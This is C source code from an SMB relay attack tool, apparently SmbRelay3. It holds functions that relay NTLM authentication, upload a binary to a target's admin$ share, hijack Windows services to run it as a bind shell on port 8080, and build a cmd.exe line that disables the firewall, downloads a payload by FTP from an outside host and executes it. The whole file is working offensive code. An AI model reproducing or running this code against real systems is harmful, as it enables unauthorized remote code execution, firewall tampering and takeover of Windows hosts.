00001 #include "payload.h"
00002 #include <time.h>
00003
00004
00005 extern int verbose;
00006 int AttackWeakServices(RELAY relay, char *buf,char *path, uint16 FID, char *ServicePath){
00007
00008 smheader *packet;
00009 uint8 ContextHandle[20];
00010 uint8 OpenedServiceContextHandle[20];
00011 char ServiceName[][100] = {"DcomLaunch","Wmi","kdc","upnpHost","SSDPSRV","DHCP","NetBT","DnsCache","Pml Driver HPZ12","Adobe LM Service","Autodesk Licensing Service", "NICCONFIGSVC","Macromedia Licensing Service","vsdatant","C-DillaCdaC11BA","CdaC15BA","SecDrv" };
00012 int len;
00013 char data[4046];
00014 int i,j;
00015
00016
00017 len=OpenScManagerWStub(data,path,SC_MANAGER_CONNECT) ;
00018 packet=BuildSmbPacket((smheader*)buf,SMB_COM_TRANSACTION,OPENSCMANAGER,(char*)data,len);
00019 ((SMB_COM_TRANSACTION_STRUCT*)packet->buffer)->FID=FID;
00020 printf("[+] Opening Remote Service Control Manager (SC_MANAGER_CONNECT)\n");
00021 i=SendBytesAndWaitForResponse(relay.destination,(char*)packet, SmbPacketLen(packet),(char*)buf,sizeof(buf),SMBWAITTIMEOUT);
00022 free(packet);
00023 if (( i<=0) || (((smheader*)buf)->NtStatus!=0x00000000) || (GetDceRpcPacketFromBuffer(buf)->PacketType != RPC_RESPONSE) ){
00024 return(0);
00025 }
00026 memcpy((char*)ContextHandle,buf+i-24,20);
00027
00028 for (j=0;j<sizeof(ServiceName)/100;j++)
00029 {
00030
00031 len=OpenServiceWStub(data,(char*)ContextHandle,ServiceName[j], SERVICE_CHANGE_CONFIG | SERVICE_START | SERVICE_STOP);
00032 packet=BuildSmbPacket((smheader*)buf,SMB_COM_TRANSACTION,OPENSERVICEW,data,len);
00033 ((SMB_COM_TRANSACTION_STRUCT*)packet->buffer)->FID=FID;
00034 printf("[+] Attacking Remote Service %s\n",ServiceName[j]);
00035 i=SendBytesAndWaitForResponse(relay.destination,(char*)packet, SmbPacketLen(packet),(char*)buf,sizeof(buf),SMBWAITTIMEOUT);
00036 free(packet);
00037 if (( i<=0) || (((smheader*)buf)->NtStatus!=0x00000000) || (GetDceRpcPacketFromBuffer(buf)->PacketType != RPC_RESPONSE) ){
00038 printf("[-] Error. Unable to Open Remote service \n");
00039 } else {
00040 memcpy((char*)OpenedServiceContextHandle,buf+i-24,20);
00041 len=ChangeServiceConfigWStub(data,(char*)OpenedServiceContextHandle,ServicePath, SERVICE_AUTO_START,SERVICE_WIN32_SHARE_PROCESS);
00042 packet=BuildSmbPacket((smheader*)buf,SMB_COM_TRANSACTION,CHANGESERVICECONFIG,data,len);
00043 ((SMB_COM_TRANSACTION_STRUCT*)packet->buffer)->FID=FID;
00044 printf("[+] Cambiando configuración de servicio...\r");
00045 i=SendBytesAndWaitForResponse(relay.destination,(char*)packet, SmbPacketLen(packet),(char*)buf,sizeof(buf),SMBWAITTIMEOUT);
00046 free(packet);
00047 if (( i<=0) || (((smheader*)buf)->NtStatus!=0x00000000) || (GetDceRpcPacketFromBuffer(buf)->PacketType != RPC_RESPONSE) ){
00048 printf("[-] Error. Unable to Modify Service...\n");
00049 } else {
00050 packet=BuildSmbPacket((smheader*)buf,SMB_COM_TRANSACTION,STARTSERVICE,OpenedServiceContextHandle, 20);
00051 ((SMB_COM_TRANSACTION_STRUCT*)packet->buffer)->FID=FID;
00052 send(relay.destination, (char*)packet, SmbPacketLen(packet),0) ;
00053 free(packet);
00054 Sleep(1000);
00055 printf("[+] *** Remote SmbRelay3 BindShell Service Running ***: (%s:%i)\n\n",relay.hostname,8080);
00056 Sleep(3000);
00057 return(1);
00058 }
00059
00060 }
00061 }
00062 return(0);
00063 }
00064
00065 int WriteRemoteFile(RELAY relay, smheader *buffer, char *lpFileName)
00066 {
00067 char path[256];
00068 char buf[64000];
00069 smheader *packet;
00070 int i;
00071 int filesize;
00072 char *filedata;
00073 uint16 FID;
00074 uint16 TreeID;
00075
00076 sprintf(path,"\\\\%s\\admin$",inet_ntoa(relay.destinationaddr.sin_addr));
00077 memset(buf,0,sizeof(buf));
00078 i=BuildTreeConnectAndXStub(buf,"",path,"?????");
00079 packet=BuildSmbPacket((smheader*)buffer,TREECONNETANDX,0,buf,i);
00080 printf("[+] Trying to connect to admin$\r");
00081
00082 if (debug)
00083 {
00084 CleanLine(verbose);
00085 DumpMem((char*)packet,SmbPacketLen(packet));
00086 }
00087 i=SendBytesAndWaitForResponse(relay.destination,(char*)packet, SmbPacketLen(packet),(char*)buf,sizeof(buf),SMBWAITTIMEOUT);
00088 if ((i<=0) || (((smheader*)buf)->NtStatus!=0x00000000) ){
00089 CleanLine(verbose);
00090 printf("[-] Error. Unable to connect to admin$\n");
00091 return(0);
00092 }
00093 TreeID=((smheader*)buf)->TreeId;
00094
00095
00096 sprintf(path,"\\%s",lpFileName);
00097 filedata =ReadFileToSend(&filesize,lpFileName);
00098 if(!filedata)
00099 {
00100 CleanLine(verbose);
00101 printf("[-] Error. Unable to open %s\n",lpFileName);
00102 return(0);
00103 }
00104 packet=BuildSmbPacket((smheader*)buf,NTCREATEANDX,0,path,filesize);
00105 CleanLine(verbose);
00106 printf("[+] Creating Remote File %s under admin$\r",lpFileName);
00107 if (debug)
00108 {
00109 CleanLine(verbose);
00110 DumpMem((char*)packet,SmbPacketLen(packet));
00111 }
00112 i=SendBytesAndWaitForResponse(relay.destination,(char*)packet, SmbPacketLen(packet),(char*)buf,sizeof(buf),SMBWAITTIMEOUT);
00113 if ((i<=0) || (((smheader*)buf)->NtStatus!=0x00000000) ){
00114 CleanLine(verbose);
00115 if ( ((smheader*)buf)->NtStatus == STATUS_SHARING_VIOLATION) {
00116 printf("[-] Remote File already in use (try to connect to the remote Shell).\n");
00117 return(1);
00118 }
00119 printf("[-] Error. Unable to create file under admin$ (Error 0x%x)\n",((smheader*)buf)->NtStatus);
00120 return(0);
00121 }
00122 memcpy((char*)&FID,((smheader*)buf)->buffer+6,2);
00123 CleanLine(verbose);
00124 printf("[+] Writing File %s into admin$ (%i bytes)\r",lpFileName,filesize);
00125 packet=BuildSmbPacket((smheader*)buf,WRITEANDX,0,filedata,filesize);
00126 free(filedata);
00127
00128 if (debug)
00129 {
00130 CleanLine(verbose);
00131 DumpMem((char*)packet,SmbPacketLen(packet));
00132 }
00133 i=SendBytesAndWaitForResponse(relay.destination,(char*)packet, SmbPacketLen(packet),(char*)buf,sizeof(buf),SMBWAITTIMEOUT);
00134 if ((i<=0) || (((smheader*)buf)->NtStatus!=0x00000000) ){
00135 CleanLine(verbose);
00136 printf("[-] Error. Unable to Write File.\n");
00137 return(0);
00138 }
00139
00140 packet=BuildSmbPacket((smheader*)buf,SMBCLOSE,0,&FID,2);
00141
00142 packet->TreeId=TreeID;
00143 if (verbose)
00144 {
00145 CleanLine(verbose);
00146 printf("[*] Closing File handle - FID: %2.2x\r",FID);
00147 if (debug) DumpMem((char*)packet,SmbPacketLen(packet));
00148 }
00149 i=SendBytesAndWaitForResponse(relay.destination,(char*)packet, SmbPacketLen(packet),(char*)buf,sizeof(buf),SMBWAITTIMEOUT);
00150 if ((i<=0) || (((smheader*)buf)->NtStatus!=0x00000000) ){
00151 CleanLine(verbose);
00152 printf("[-] Error Closing File Handle\n");
00153 return(0);
00154 }
00155 return(1);
00156
00157 }
00158
00159
00160
00161
00162
00163 smheader *BuildSmbPacket1(void)
00164 {
00165 char buf2[4096];
00166 smheader *SmbPacket1;
00167 memset((char*)buf2,'\0',sizeof(buf2));
00168 BuildAuthRequest((tSmbNtlmAuthRequest*)buf2,0,NULL,NULL);
00169 #ifdef _DBG_
00170 DumpMem((char*)buf2,SmbLength((tSmbNtlmAuthRequest*)buf2));
00171 #endif
00172 SmbPacket1=BuildSmbPacket((smheader*)NULL,SESSIONSETUPANDX,0,buf2,40);
00173
00174 return(SmbPacket1);
00175 }
00176
00177 smheader *GetSmbPacket2(RELAY *relay,smheader* Packet1)
00178 {
00179 char *buffer=(char*)malloc(4096);
00180 int i;
00181 i=SendBytesAndWaitForResponse(relay->destination,(char*)Packet1, SmbPacketLen(Packet1), buffer,4096,SMBWAITTIMEOUT);
00182 if (i>0){
00183 return((smheader*)buffer);
00184 }
00185 return(NULL);
00186 }
00187
00188 smheader *GetSmbPacket3(smheader* SmbPacket2,char *lpUserName, char *lpPassword, char *domainname, char *host, tSmbNtlmAuthResponse* OptionalNtlmPacket3)
00189 {
00190 char buf2[16384];
00191 smheader *SmbPacket3;
00192 memset((char*)buf2,'\0',sizeof(buf2));
00193 buildAuthResponse((tSmbNtlmAuthChallenge*)GetNTLMPacketFromSmbPacket(SmbPacket2),(tSmbNtlmAuthResponse*)buf2,0,lpUserName,lpPassword,domainname,host, OptionalNtlmPacket3);
00194
00195 SmbPacket3=BuildSmbPacket((smheader*)SmbPacket2,SESSIONSETUPANDX,0,buf2,(int)SmbLength((tSmbNtlmAuthResponse *)buf2));
00196 return(SmbPacket3);
00197 }
00198
00199
00200
00201 char *GenerateFTPTransfer(char *buffer,char *host, int port, char *username, char *password, char *downloadfile,char *optionalparameter)
00202 {
00203 char tmp[256];
00204 char path[256];
00205 char fullpath[100];
00206 int random=0;
00207
00208 srand(time(0));
00209 random=rand();
00210 sprintf(path,"\\%i",random);
00211 srand(random);
00212 random=rand();
00213 sprintf(fullpath,"%s\\%i",path,random);
00214
00215
00216 sprintf(tmp,"cmd.exe /c if EXIST %s\\%s (%s\\%s) ELSE netsh firewall set opmode DISABLE DISABLE & ",path,downloadfile,path,downloadfile);
00217 strcpy(buffer,tmp);
00218
00219 sprintf(tmp,"md %s",path);
00220 strcat(buffer,tmp);
00221 sprintf(tmp,"&& echo o %s %i>%s",host, port,fullpath);
00222 strcat(buffer,tmp);
00223 sprintf(tmp,"&& echo %s>>%s",username,fullpath);
00224 strcat(buffer,tmp);
00225 sprintf(tmp,"&& echo %s>>%s",password,fullpath);
00226 strcat(buffer,tmp);
00227 sprintf(tmp,"&& echo USER %s>>%s",username,fullpath);
00228 strcat(buffer,tmp);
00229 sprintf(tmp,"&& echo %s>>%s",password,fullpath);
00230 strcat(buffer,tmp);
00231 sprintf(tmp,"&& echo bin>>%s",fullpath);
00232 strcat(buffer,tmp);
00233 sprintf(tmp,"&& echo lcd %s>>%s",path,fullpath);
00234 strcat(buffer,tmp);
00235 sprintf(tmp,"&& echo bin>>%s",fullpath);
00236 strcat(buffer,tmp);
00237 sprintf(tmp,"&& echo GET %s>>%s",downloadfile,fullpath);
00238 strcat(buffer,tmp);
00239 sprintf(tmp,"&& echo bye>>%s",fullpath);
00240 strcat(buffer,tmp);
00241 sprintf(tmp,"&& ftp -s:%s",fullpath);
00242 strcat(buffer,tmp);
00243 if (optionalparameter) {
00244 sprintf(tmp,"&& %s\\%s %s",path,downloadfile,optionalparameter);
00245 } else {
00246 sprintf(tmp,"&& %s\\%s",path,downloadfile);
00247 }
00248 strcat(buffer,tmp);
00249
00250 return(buffer);
00251 }
00252
00253
00254